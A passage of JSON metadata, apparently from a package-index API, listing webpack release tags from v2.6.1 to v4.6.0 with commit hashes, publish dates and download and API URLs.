4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21T08:26:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb70585cf04a92cd99e004e4879f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at":"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9ffbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0dc62b7b4cc1ee3170c8ce3dd581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","sha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","published_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea30","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sha":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","published_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","kind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"},{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8d